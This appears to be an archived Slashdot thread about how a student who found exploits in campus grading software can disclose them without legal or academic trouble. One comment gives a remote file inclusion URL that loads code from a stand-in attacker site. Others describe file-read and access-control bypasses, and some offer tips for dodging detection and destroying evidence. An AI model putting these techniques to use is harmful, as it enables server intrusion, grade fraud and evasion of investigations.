Disclosure of Major Software Exploits by Students? 503
school-hacker asks: "I am a U.S. university student who has recently come across 2 remote exploits for a homework program used by colleges nationwide. Both vulnerabilities allow students to give themselves arbitrary scores, and possibly execute arbitrary code. To further emphasize the scope of this vulnerability, I have written and -selftested proof-of-concept exploit code. Naturally, I want to share this information with their software engineers, and would even be nice enough and suggest a means to fixing it. However, with the state of current intellectual property and reverse-engineering laws, I hesitate to do so out of fear of litigation or academic disciplinary action. As an ethical geek, what do -you- do?" While the responses from an earlier story might prove useful, here, there is always the possibility of the university making things harder for the person reporting the problem. How can students avoid both legal and academic trouble, when trying to notify their university of security problems?
the Slashdot way (Score:4, Funny)
still better, post the expolits here , we will make sure they come to know.
Re:the Slashdot way (Score:5, Informative)
Send the mail with exploit to abuse/contact/CEO@companywithexploit.com
Tell them that you will release the exploit within 30/60/90 days on Bugtraq, Freenet and Slashdot unless they fix it.
Make sure you also send the mail to:
-Local/regional newspapers.
-The school/school council/principal/teachers/newspaper.
-Local government official(s).
If they don't fix the shit after this, release the exploit *anonymously*.
Re:the Slashdot way (Score:5, Insightful)
Re:the Slashdot way (Score:3, Insightful)
The solution is obvious. (Score:2)
The problem will solve itself.
Re:This is what I did when it happened to me (Score:5, Insightful)
Doing good coding can get you some nice job references (as per your teacher at University), and some good friends down the line, but it doesn't excuse you from the rules per detention, etc. (what the detention was about is a different issue, so I just won't go there).
Encrypting the code is, at best, bad karma. It could come back to haunt you years down the road when an important contract is nixed because a friend of a friend remembers what you did way back when. Relationships are one of the most important things we have in life, and when you burn enough bridges life just gets less and less pleasant. I'm sometimes shocked by where the contacts I've built up over the years have taken me.
BTW: If you were actually paid to develop that school code that you encrypted, my guess is that the only reason they didn't sue your ass of is that you didn't have any money in your pants.
Please post the exploit here (Score:5, Funny)
Allah thanks you.
Do what Captain Kirk did! (Score:3, Interesting)
Kirk cheated.
That's what I suggest be done here. If we can re-program the simulation to come out on top, I see no reason why we shouldn't get a commendation for original thinking.
Kirk didn't like to lose. Neither should we.
Anon (Score:4, Interesting)
Re:Anon (Score:5, Funny)
What is the goal? (Score:5, Insightful)
Re:What is the goal? (Score:5, Insightful)
Give Yourself an A (Score:5, Interesting)
Seriously, I'd take this slow. Perhaps writing something up in printed form and submitting it via snail mail would be smarter than having executable code lying around on a computer you own or have access to.
Re:Give Yourself an A (Score:5, Insightful)
Since you've done work for someone else--that they should be willing to pay for--I would argue that you should be compensated. However, I would also recommend legal counsel as to how you can present this offer without it sounding like extortion. And, even if you're willing to give it away, I would still seek said counsel--consider charging the application manufacturer only enough to cover your counsel.
I would watch it, because you could certainly get into legal trouble--I believe that the Russian hackers mentioned a while back only wanted to work in IT, but made clumsy attempts to break into the field. It's easy to take a genuine offer as an extortion, although I think by rights you are due compensation.
Re:Give Yourself an A (Score:3, Informative)
Nearly ever campus has free legal advice for students consultation.
Re:Give Yourself an A (Score:5, Insightful)
- As the previous poster said, an attempt to solicit compensation from the software vendor for "work done" could constitute attempted extortion, and as such could be illegal.
- Even if you do this in a legal way, you stand a good chance of being portrayed in the media as an evil money grubbing bastard.
- If you get branded as evil, other people who are looking for a exploits as a genuine public service will also tend to be "tarred with the same brush". That is likely to put them off doing this important work, which would be a BAD THING!!
If you are nervous about the whole position, your best bet is to inform your school. (Do it in such a way that you don't give them any evidence they could use against you until you know that they will treat you fairly.)Your school has a vested interest in not having students hack the marking software they use. They won't want their grading schemes to be publicly called into question. They should also have the resources to deal with the question. If they decide to ignore the issue, they may get into legal trouble later on when they are sued by ex-students whose degrees have been "devalued".
Re:Give Yourself an A (Score:5, Insightful)
Re:Give Yourself an A (Score:3, Interesting)
Re:Give Yourself an A (Score:5, Funny)
Re:Give Yourself an A (Score:5, Funny)
Re:Give Yourself an A (Score:4, Interesting)
Keep in mind that although you may not get caught, you might get even worse than caught. Any reputable college will likely set up an expulsion hearing for academic fraud. Even worse, in my home state (Arkansas), it is a class D felony to modify academic records at a higher institution. Actually, they busted a couple of people working in the transcript office for altering grades last fall at my college. w00t! H4x0r5 uN1T3!
Re:Give Yourself an A (Score:3, Interesting)
Rus
like the big boys (Score:2, Insightful)
Like the big boys do it.
Anonymous WHAT ?!?! (Score:3, Insightful)
Re:Anonymous WHAT ?!?! (Score:5, Funny)
The Internet offers no anonymity. So just print out the code on a locally connected printer (not a network printer). Wait until nightfall, then go to a conspicuous area on campus that is free of security cameras. Buy a can of spray paint (NOT online- that would be stupid!) and spray the working exploit code onto a wall of a building.
Be sure to provide comments and please make sure the code compiles before you spray it.
Then go home and throw your computer into a vat of nitric acid. And that's that!
Re:Anonymous WHAT ?!?! (Score:3, Funny)
It says Romans go home.
No it dosn't.
Re:Anonymous WHAT ?!?! (Score:3, Funny)
Re:Anonymous WHAT ?!?! (Score:3, Funny)
Sure there is, do it like the spammers do -- find an open SMTP relay somewhere in China or Korea, and send it through there.
What to do (Score:4, Insightful)
Re:What to do (Score:3, Insightful)
Take it from someone who has been a computer lab assistant, technician, and web developer successively (that'd be me). IT faculty are pretty receptive to this kind of thing.
Now if
If you want to avoid getting into trouble... (Score:3, Insightful)
Re:If you want to avoid getting into trouble... (Score:5, Insightful)
Re:If you want to avoid getting into trouble... (Score:2, Funny)
Ask First (Score:2)
This also makes it obvious that you were really trying to help find/enhance security rather than just hacking into the system for your own benefit.
How about.... (Score:5, Funny)
Blackboard (Score:5, Informative)
This software tries to be everything to everyone, and all most teachers use it for is posting grades.
It doesn't surprise me that there are bugs in it, though. There have been several show up on astalavista.box.sk, and those were fixed, but the design of the program doesn't strike me as being particularlly sound.
~Will
if blackboard (Score:3, Insightful)
Re:if blackboard (Score:3, Informative)
I am sure that it uses POST instead of PUT.
~Will
blackboard? not necessarily.. (Score:5, Informative)
Compromising Banner is far more dangerous than Blackboard (Bb).... Most schools that use Banner use it as their student management system, which records official transcript, program requirements met, class registration, etc. etc.
In my last undergrad semester, my team developed a website that interfaced directly w/ the Banner system and even found some loopholes in it which we exploited to allow our website to do a better job at calculating program requirements met and suggested offerings to complete it. (This was for an Advanced Software Project Mgmt class)
Needless to say, the Registrars office people were very intrigued by our exploration into the limits of the current system. I imagine a less cooperative school administration would be more punitive.. (But I went to a business school, so they know we just get motivated by $$
Re:blackboard? not necessarily.. (Score:5, Informative)
To understand the issue, you have to know that it uses Oracle Application Server which basically lets you execute packages in the database. All of the main web packages do user validation but some of them call other packages to display the content of the page (which don't always do validation).
So, if you know what variables to pass to said packages, you can bypass their security. SCT told me that since those were only supporting packages, they were functioning properly and they wouldn't do anything to change them.
Granted, you have to have a pretty in depth knowledge of how their web products work but that's a good number of employees at any school using Banner. We have access to all of the package/program source so we can customize it for our university's needs.
Oh well, I've ranted about SCT enough.
What was funnier though was when I discovered that our database had execute any procedure granted to public, i.e. the web user. That essentialy opened up any database procedure to be executed by an anonymous user via the web. I think that one was our fault instead of SCT's and it was fourtunately taken care of fairly quickly.
Re:blackboard? not necessarily.. (Score:3, Interesting)
Not Blackboard! (Score:3, Funny)
Can't we blame this on Microsoft somehow instead?
Not willing to fight your own battles? (Score:5, Interesting)
Find someone who will or is better able to the local student newspaper.
Grab a reporter, show him it, let him follow up.
Re:Not willing to fight your own battles? (Score:5, Insightful)
And you'll wind up with a very freaked out administration. What you want to do is to bring the problem to the attention of one of the techies that run the system, they might react sanely.
What's even better is to send the developers an anonymous bug report (not from a university IP etc.), and, if they don't react, to BugTraq or another security list.
You might also want to wait until you're graduated :)
That's how Stefan Puffer got indicted (Score:2, Informative)
What's in it for me? (Score:3, Interesting)
Re:What's in it for me? (Score:3, Insightful)
Yeah, what he said. Do you have a prof that you respect & have a good relationship with? Hey, maybe thats a dumb question, but I went to a small school. Anyway, you can potentially turn it into a proof of knowledge in subject matter & get credit. Also, having a faculty member on your side should mitigate th
Re:What's in it for me? (Score:5, Funny)
Goblin
Anonymously email the company (Score:2)
Hopefully it gets someone's attention, it gets patched, and admins at schools apply the patch. Will you get credit for your findings? No. Will you stand a chance at getting the hole fixed without any real fear of retribution? Yes.
-----
Unfortunately (Score:3, Insightful)
Re:Unfortunately (Score:2)
simple? (Score:5, Interesting)
Re:simple? (Score:4, Funny)
Don't use your handwriting. Use a widly available laser printer, and a toner cartrige bought in a different state than the University involved. Purchase the envelope, paper, and toner cartrige with cash only. Do not keep any receipts.
Mail the letters from a public drop box where no ATMs, drive up windows, or gas stations are near by so you don't accidentally get on a security camera. Mail the letters on a high volume day, preferable 4 days before a major holiday (Christmas, Easter, Mothers/Fathers Day, Valentines Day, Thanksgiving Day).
In case a camera may catch you walking buy (never drive to the mail box), buy large baggy clothes you don't normally wear (with cash of course) and a wig / facial hair for your trip to the mail box.
Destroy the clothes either by burning them far out of town in a campfire (don't drive near the cam fire, bury the ashes), or by throwing them away in separate dumpsters on seperate days of the week, in seperate towns (preferably towns that do not send their trash to the same land fill.
If you take these precautions then you should be ok.
That or just don't mail the notifications.
robi
but of course... (Score:5, Funny)
Suggestion #1 (Score:5, Insightful)
$.02 (Score:4, Funny)
Also demand that the school indemnify you against any civil actions. While you're at it, you might as well require a statement that no military action will be taken.
Finally, offer them your consulting services at $500/hr, minimum 10 hours.
Disclaimer: IANAL, BIPOOSD (but I play one os
You must do what is right... (Score:2)
But first... (Score:2)
Re:But first... (Score:2)
Good deeds don't go unpunished (Score:2, Insightful)
If you can send something anonymously then I think you have done what you can.
Don't jepordize your future over a good deed.
Also: what do you have to gain, aside from some kudos? You have far more to loose if someone takes what you do the wrong way.
Remember: Good deeds
The standard way. (Score:3, Informative)
How about... (Score:2, Insightful)
In all seriousness we live in such a paranoid culture that there isn't really a right answer that anyone can give you. It's nice to see that someone out in America has a conscience but my paranoid mind is telling me that if a student came over and told me that there were exploits in the
I'll report it. (Score:2)
Consult your AUP (Score:5, Interesting)
What would be their concern in punishing you? To dissuade every wanna-be cracker on campus from poking around the innards of the computer network. Though we all know security through obscurity does not work, your school does not want everybody trying to eliminate that obscurity.
When you compose your statement of disclosure, include a statement which argues for your concern and your compliance with the AUP. Cite it, quote it, and argue for your concern for staying within the published regulations of the University. So long as you have not used this exploit to your advantage and so long as you show concern for the things they are concerned about, you should be fine.
-jag
Three things (Score:5, Interesting)
Two, do notify the vendor, BUT use the disclosure guidelines provided by Rain Forest Puppy (called RFPolicy). This is the best template for fair and equitable disclosure I've ever seen, and I feel it's even a hair better than the policy put forth by @Stake (although theirs is pretty good too). Set up a hushmail account that cannot be traced back to you for this purpose, and proceed from there.
Three, do NOT disclose the proof-of-concept exploit code. Disclosing a vulnerability is enough, there is no reason to automate attacks that take advantage of it.
By the time the university knows anything, they will no longer be able to accomplish anything by making your life hard. Furthermore, you will be in a position of strength, having taken the high road in disclosure and given all parties every opportunity to protect themselves properly.
Had this problem with SUN (Score:5, Interesting)
They were running a comment system that did server side includes. The URL pattern was
http://java.sun.com/foo.jsp?url=relative/path.i
The obvious hack would be to enter a file: URL and see if it worked and sure enough I could browse through the whole file system as long as I knew the path.
Stupid Java engineers.
Anyway... I contacted a few VPs at SUN and just told them that I had discovered a severe security hole in their webserver and that because of the DMCA I couldn't report it.
They were quick to respond telling me that they WOULDN'T prosecute if i were to give them the security disclosure so they could fix the issue.
Most people won't care as long as you are white hat. If they freak out then don't reveal the information
Kevin
Re:Had this problem with SUN (Score:2, Informative)
http://java.sun.com/foo.jsp?url=relative/path.inc
I'm not sure if this was the case here, but this can be far more dangerous in some cases, since you can do off-server includes (in PHP at least).
This means you couuld do something like:
http://java.sun.com/foo.jsp?url=http://www.hax0r- s ite.com/mycode.inc
And it would execute "mycode.inc" on their server, meaning you could run *arbitrary* code on their server.
Been the coder (Score:3, Interesting)
I must say that I greatly appreciated when somebody informed me of the hole, though I felt like an idiot afterwards. Not e
SCO's code probably made it into the exploit.. (Score:2, Funny)
some advice whether you want it or not (Score:5, Insightful)
Remember you wil be dealign with two or three groups that have different motives for their existence; ie IT group of your college, college Management, and the software vendor...
You do not have enough power or pull to report this on your own and should not do so as it woudl put your college studies in danger, head this warning!
Waht you need to do is find a tenured CS faculty member that will be a guinea pig fro a blind computer experiment..blind in that he or she does not know ahead of time the directions you will be giving..
The directions must be in the form of question of:
Waht happens if I do this what will occur..in other worsd you are leading the faculty member on the trail of discovery..
Once they get to the end its is then their responsibility fo reporting the security hack and thus your college studies are protected..
If you want progress, release it. (Score:4, Insightful)
If you release the exploit anonymously, you'll get things fixed. If you release it with your name attached, you'll get things fixed and bring a shitstorm down on your head -- your choice if you want the notoriety and its consequences.
Sumbit it to the author/maintainers and bugtraq (Score:2)
-Adam
If past experiences have taught us nothing.. (Score:3, Insightful)
YOU DON"T TELL ANYONE (Score:4, Funny)
The conspiracies on slashdot... (Score:4, Interesting)
Remember: The university cares about a student paying 20k+ a year to be there, the software company is costing the U money, who would they rather attack?
Anonymity is for spammers. You'll probably get some recognition in the CS department if you say something about it... unless your teachers are all secretly black hat, and hate your guts for exposing yourself
Talk to a Professor (Score:5, Insightful)
It is highly likely that they will be willing to approach the PTB about the issue--leaving you entirely out of it. At most universities, such a software vendor won't try to get your identity from a prof, they know where their bread is buttered.
If all else fails, drop me an email at roberts period six-two-eight period osu period edu. I'm a prof at Ohio State and I'll be happy to lend a hand.
Better than anonymous (Score:5, Insightful)
You can use this... (Score:2)
Its called Full Disclosure... (Score:5, Interesting)
If bugs are kept secret, the secrets get held in the hands of the few. The unethical hacker [cracker] will eventually exploit the code and use it to their advantage.
If it weren't for FD, we'd have more 0day exploits because companies would not feel the pressure to release timely updates. It chews up development cycles to go back and put an emergency fix in place for insecure code, test it, and release it. Do you think companies would do this voluntarily? I think not. Too expensive. They'll include it with their next major update and charge for the upgrade or some crap like that.
I say the medicine is bad, but the disease is worse. Full Disclosure is the Medicine, bad coding the disease.
We are going to continue down this road of FD debate until software vendors (M$ et al.) start writing secure code. I have said it many times; Requiring patches to achieve security is fundamentally flawed. Coders need to write secure code. The onus is on them. Don't blame the hackers/crackers for airing their dirty laundry. If M$ or whoever loses market share because they consistantly release insecure code that is repeatedly being compromised then that is their fault.
It was only after being repeatedly beat over the head with the proverbial lead pipe by the hacker community that good ole Bill Gates sent out a memo stating that Security is becoming Microsofts #1 priority. Do you really think he would have done that if we didn't have the Full Disclosure in place? We should not rely on 'security by obscurity' by keeping the exploits secret, or keeping the information reserved for the security elite.
Send a confidential email to the network administrators and to the company that created the software. State that you will give them adequate time to respond and to release a patch. State that the exploit will undergo full disclosure in two months, or if they request extra time, ask them what measures are being taken to insure the integrity of the information being stored on these computers. If you can hack into the system to raise your grades, others could hack in to lower the hard earned grades of others. Hell, at that point, they should start selling diplomas at the bookstore.
Re:Its called Full Disclosure... (Score:3, Insightful)
Use it to disclose it (Score:3, Funny)
As a university sysadmin.... (Score:5, Interesting)
I can understand wanting to cover your backside with this. Especially since you have 'tested' the exploit. Going to the university may mean the end of your academic career. Going to the company may result in the same in a round about way. The company may feel obligated to report you to the said university.
If you are serious about getting the expoit fixed then there are a lot of good points already made in the replies:
- Send it to the company anonymously.
- Send it to the university IT dept. anonymously.
Do both and that should get it where you want it to go.Now for my take on this (if you were one of my students)...
You are supplying the source of the proof of concepts, right? I accept no binaries from unkown source, escpecially with your story. You have to convince me that you are not only legit. but being honest. If you approach me you had better be able to prove that you have not altered your grades. This is not due to my morals but due to my obligations to the university.
I have dealt with students bringing up exploits to me that they have found work in our system. First I have to verify their claim, second I have to consider the damage they may have done (purposefully or not). If this means a call to security then I am obligated to do that. After that I have to consider fixing my system and damage control.
Note about security: I need not bring security into it but I must document everything incase the incident becomes a concern in the future... Example, next year you suddenly become a honor student.
A comment by 'has' bothers me... if this is you then you could be in deeper then you want to be... I would suggest cleaning up your act, taking an ethics course and getting on with your degree. This type of un-ethical, and probably illegal (fraud?) activity will eventually catch up with you if continued. Enough preaching.
Take the suggestions regarding anonymous submissions if your serious about helping.
Merlin.
A little late... (Score:4, Interesting)
Come across? Like you woke up one morning and found them in your mailbox, between credit card offers?
Both vulnerabilities allow students to give themselves arbitrary scores, and possibly execute arbitrary code. To further emphasize the scope of this vulnerability, I have written and -selftested proof-of-concept exploit code.
Now I'm thinking - did you have a legal copy of the software you were "testing"? If not, do you know the person/entity who has the legal copy? Did you get their permission to poke around?
I would expect the litigation or academic discipline, if you pursued your experiment without a legal copy, or at least the permission of the person who owned the licensed copy. Or at least asked a professor to act as advisor for your experiments.
As an ethical geek, what do -you- do?
Ask permission from the target company before pursuing exploits.
I may be reading too much into the poster's brief notes (or maybe the poster's name), but I have a feeling that there are several illegal (and possibly unethical) things that have been done so far. The best way to avoid a situation like this is to plan to be ethical, legal, and open from the beginning. Get the company's permission, the schools permission, etc., and no one will be suprised when you get some results. Otherwise, they may say "Thank you, now please come to court in two weeks", and you have little recourse except to hire a lawyer.
Which the poster should probably do, anyway. It's a shame - with the proper authorization, this could have been an interesting senior project.
Find a professor you trust... (Score:5, Insightful)
If you decide to pursue the route of getting something done about it, I'd suggest:
Re:Find a professor you trust... (Score:3, Funny)
yo, is this blackboard??? (Score:3, Interesting)
email me.
Post the info anonymously on Freenet (Score:3, Informative)
And then give yourself an A.
Chaotic Good, my friend! Say nothing. (Score:5, Interesting)
Yes, this is insane, but it's also how it is.
--True, if you take the right approach, have the right kind of charisma, (ie, express honesty and even explain your concerns up front about how other people before you being punished for having done the right thing in the past,) you might be able to pull it off. I wouldn't count on it though. The sheep behind the glass are getting colder every day, and even a smooth talker like me has been really having to sweat in order to earn my best intentions. It's getting tough out there.
So in this instance, and others like it, I wouldn't bother.
And just to be clear, I wouldn't use the exploit either. --Chances are, if you do, you'll really end up in hot water. Indeed, I strongly suspect that some cases of these kinds of exploits are designed to discover those who are not sheep-like enough so that they can be flagged for later. . , uh, disposal. (Same goes for things like performing acts of geurilla advertising, and ad-defacement of particularly nasty posters and billboards around your town. That sort of thing is monitored.)
--Which, of course, means that if you try in earnest to bring the hole in the code to the attention of the 'masters of the universe', then somebody, somewhere will be all pissed off with you for ruining their entrapment scheme.
My advice? Sit tight. --The furthest you might want to go is to discuss it openly to anybody who cares to listen, saying you heard about it on the net from some anonymous coward. Wide open honesty is usually the best way to screw evil plans without bringing down reprisal and brimstone on your head. Works for me.
-FL
DO NOTHING (Score:5, Insightful)
Do nothing. Sure, you can pat yourself on the back for your ingenuity, but file your discoveries away in your mind. The world cannot tolerate them now.
Sad. But true.
Serious Suggestion (Score:3, Interesting)
The fact is, with this sort of thing, the squeaky wheel gets whacked with a sack of doorknobs.
You are already in serious trouble. (Score:3, Informative)
If you do report the problem, the IT administrators will be obliged to perform a damage assessment. They will scan their logs for behavior possibly taking advantage of this exploit. That you say you have proof of concept code, and presumably have tested it, if IT discovers that you have so much as tried to take advantage of this or a related exploit, it will almost certainly result in your dismissal for that Semester, criminal charges, and possibly the end of your academic career.
It won't help to go through a professor. If IT comes back and says that they have evidence that you tried to take advantage of the exploit (by 'testing'), you will not be spared, and the professor will either be unwilling or unable to protect you.
If you do not report the problem, you risk IT discovering the exploit on their own or through a security update from the vendor, and similarly performing damage assessment to discover whether or not their systems or data have been compromised, or attempted to have been compromised.
Don't scoff at this. If it is a significant exploit, and given that there is now a story on Slashdot about it, there is a significant possibility that IT will perform a damage assessment.
Further, depending upon how you found or 'tested' this exploit, IT may find you out whether or not they realize or are alerted to the nature of the exploit.
It is really up to you. Only you know the nature of your investigative activities and testing. If discovering these exploits required behavior which went beyond the normal use of the system, then you have a very serious problem.
How do you explain why you were doing this in the first place? You can't, and quite honestly, there is almost certainly no excuse for it. If you were concerned about the security of the system, you should have gone through official channels to get clearance to look for vulnerabilities, and report the sort of investigative techniques you would be using, and do only this.
If you have not done this, then you have one course of action:
- Find out how long of a period IT keeps logs for. If you are a technically inclined, student, then surely you have aquaintences -- students -- who work in IT.
- If the logs of your activity are gone, then you are in the clear. Report the vulnerability anonymously the next time you are off campus. Unfortunately, from the few academic IT departments I am familiar with, they keeps logs for a very long time, because of issues just like these.
- If, on the other hand, the logs of your activity are not gone, then weigh the possibility of your activity being found out before the logs will be cycled or destroyed.
If the logs will be around for months still, then you are quite possibly in serious trouble. If the logs will be around for a year or more, then you are almost certainly in very serious trouble.
If you report your activities, then you are are almmost certainly in very serious trouble.
Personally, I would go with the first option, and hope that your IT department will not perform damage assessment, or that they will not find out above the exploit until next semester, and will not be interested in logs from the previous semester, or perhaps from the previous academic year.
As a student....this is a really simple case. (Score:3, Insightful)
After you graduate, if you want to report it, send hard copy source listings to admins of the system at the college, the company that runs the software, and several professors in the technical areas of your college. You then forget this and don't ever think of it again.
Destroy the computer the harddrive the printout you had was created on. This is so you cannot be determined to have cheated at your degree if you ever DID get "located".
I suggest wiping it with the software that PGP comes with then taking a road trip to celebrate graduation to a couple states away. If you're in California, visit Iowa. If you're in New York, I would have to say GA is nice in May. Leave it in a dumpster somewhere mixed in with nothing else of yours.
I think in 10 years there will be a system of computer ethics, or a government board that you can report this stuff to with a condition of amnestey. Its all too new to too many people for that to work right now, so you just have to practice silence.
DO NOT GIVE OUT YOUR NAME (Score:3)
In this climate, you have everything to loose and very VERY LITTLE to gain no matter how cool you think it is.
The school must follow no laws but it's own and can expell you, and I PROMISE you that somewhere somehow you violated their AUP or TOS.
The vendor can sue you, and even if you beat them you are stuck with a HUGE legal bill.
You can get some overzealous local DA trying to move up the ladder to take you on. If you don't have a lot of money you are a tempting target for obvious reasons.
You need to understand the DMCA (and companies who file suit under it) claiming that attempts at circumvention are illegal.
And what would you gain? I think you'd be surprised at how very little unless you want to work for a security company, and even then that is tough. Folks with hacking pasts are often radioactive in the IT world, and with big companies especially so. You'll have a very hard time getting a background clearance.
I'd notify the vendor and some lists 100% anonymously (and not just spoofing an email). If they don't act in the reasonable time frame full disclosure and it will be sure to get fixed. You've done your part, with none of the baggage.
You need to think through how limited the upside is. College kids love the challenge, and want to feel proud for doing the right thing. Commercial companies hate to be embarrassed, and will sic their lawyers on you if given half a chance.
Blackboard already went down this route I think with some kid they sued to convince him that he hadn't found a vulnerability. Much of the business world does not particularly care about right and wrong, what they do care about is $$ and lawyers.
College is wonderful, don't let it fool you.
And frankly, given that the industry has forced through so many rediculous laws (UCITA anyone?), give them a fair 30 days but then go full-disclosure. What goes around comes around.
Re:DO NOT GIVE OUT YOUR NAME (Score:3, Interesting)
In this climate, you have everything to loose and very VERY LITTLE to gain no matter how cool you think it is.
I agree with Augustz's post 100%. Use a public library (not the school's library, but the public library) to send an email from a free email service, and make sure the service is not in the US.
Read about how Blackboard treated two students here [com.com] and see if you think reporting the problem is safe or not. In view of BlackBoard's past action
Contact Me (Score:5, Informative)
case, however, I would still be happy to take your discovery to the vendors of whatever software it is on your
behalf.
I work for a major university as the Blackboard programmer/administrator. I've been working on the
Blackboard code for years, making substantial modifications to the Bb system to suit our university. I've found
my share of bugs, problems, and more than one gaping hole. Blackboard is riddled with XSS, input validation, SQL
insertion, replay, predictable sequences, and I'm sure countless other vulnerabilities. Quite frankly I'm amazed
at how few breaches I hear about.
I think you're right to be careful, but try to not get carried away. At least in our department, we're eager to
hear about problems and fix them. We're not interested in ruining someone's college education. However, you
should be careful about who you contact. At our university, the usual IT people are paranoid. You need to
get as close to the people who deal with Bb as you possibly can. Contacting a suit in upper IT would likely get
you the slapdown. Start lower. You're looking for the geeky programmer who deals with Bb all day long and would
drop everything they are doing to fix a hole in their system.
If you are not comfortable contacting representatives at your university, feel free to contact me about your
discovery. This sort of stuff is what I do, and besides, I'm already on Blackboard's shit list. I have another
issue to report to Bb, (the afore mentioned gaping hole) and I'd be happy to send your information along with it,
with or without your name. jeff (somewhere near) jsnider.net
It happened to me (Score:3, Interesting)
I was working on a site for a client, and discovered a vulnerability that was easily exploitable in a Credit Card interface for a large, well-known company.
I sent details of the exploit, complete with working code samples to the company in a carefully written, detailed, email.
About 2 weeks later, I got a phone call from a *very* agitated man who kept saying over and over: "it's not really a problem". I simply listened; I had nothing to say since it'd already been said. I didn't say anything, and he eventually hung up on one of the weirdest phone calls I've ever had.
The vulnerability allows me to buy anything I want from any client site of said large, well-known company.
So, speak your piece. Send the details to the company/vendor, along with full details, exploit code, everything you know. Make it clear that you are not going to publish it, or at least make clear the conditions that would make you feel it necessary to publish, and put the onus on them.
I did, and I have a clear conscience.
Law School. (Score:3, Insightful)
I would still be wary when approaching them, you don't want one of them to cause trouble any more than any other. But it might be a good direction to turn.
Been There, Got Screwed (Score:4, Interesting)
In Jr. High, someone was giving out the admin password pass FoolProof (a mac protection software that was incredably simple to bypass at the time.) Anyways, I tried to inform the IT guy, and he blew me off, saying that I didn't really know the password. So I put on a little app that made the computer belch.
Someone snitched, and I ended up in the principal's office. I tried to plead my case, it wasn't like I hadn't tried to do the right thing, and when they wouldn't listen I gave them something they couldn't ignore. Detention 4 weeks.
I should have learned from my first experince but I didn't. In Highschool, the network was completely unsecure. You could print to any class room across the whole school district, and everything was named quite nicely. Once again, I was blown off when I tried to say this was a bad thing.
Not only were all the printers there, but a number of computers were open with read access to everything. So I opened a network connection to every shared disk along the network and started a find for everything. The IT guy in the lab looked over my shoulder and asked what I was doing. Detention again, this time for "Slowing the hard drives down."
If only more people got into trouble for changing the laws of phyics.
Re:What's in it for you? (Score:2)
Re:Dude, (Score:3, Interesting)
* If they release a patch, the exploit remains a complete secret, he gets a pat on the back, and everyone is happy.
* If they refuse to release a patch, he can tarnish their reputation by posting of its existence, but without sharing the details of how to exploit it. Demonstrations available upon request to trustworthy security experts.
* If they threaten legal action, he can threaten the release of the exploit.
* If they pursue legal acti